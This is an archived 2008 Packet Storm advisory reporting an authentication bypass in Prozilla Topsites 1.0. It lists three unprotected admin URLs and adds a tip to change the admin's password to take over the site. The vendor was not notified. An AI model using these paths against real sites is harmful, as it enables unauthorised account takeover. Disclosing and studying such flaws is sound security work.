prozilla-editadd.txt

2008-04-08T00:00:00
ID PACKETSTORM:65278
Type packetstorm
Reporter t0pp8uzz
Modified 2008-04-08T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ Prozilla Topsites 1.0 Arbitrary Edit/Add Users Vulnerability +==--  
--==+================================================================================+==--  
  
  
  
Discovered By: t0pP8uZz  
Discovered On: 7 April 2008  
Script Download: http://prozilla.net  
DORK: N/A  
  
Vendor Has Not Been Notified!  
  
  
DESCRIPTION:   
Prozilla TopSites in vulnerable due to bad session handling, multiple admin area files are not  
validating the users that is viewing it, therefor making it viewiable to anyone, even unregistered people.  
  
below you will find a URL that will locate the add and edit users page.  
  
  
Vulnerability:  
http://site.com/siteadmin/addu.php  
http://site.com/siteadmin/editu.php  
http://site.com/siteadmin/uidx.php  
  
  
NOTE/TIP:   
edit admin's password login to view all admin features ;)   
  
  
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !  
  
  
  
--==+================================================================================+==--  
--==+ Prozilla Topsites 1.0 Arbitrary Edit/Add Users Vulnerability +==--  
--==+================================================================================+==--  
  
  
`